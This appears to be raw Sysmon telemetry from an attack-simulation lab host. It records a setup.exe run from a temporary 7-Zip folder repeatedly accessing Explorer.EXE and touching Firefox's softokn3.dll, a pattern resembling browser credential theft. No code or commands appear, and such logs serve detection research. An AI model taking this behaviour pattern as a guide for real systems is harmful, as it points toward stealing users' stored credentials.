13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\softokn3.dll2021-01-18 13:59:52.552 10341000x800000000000000015409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
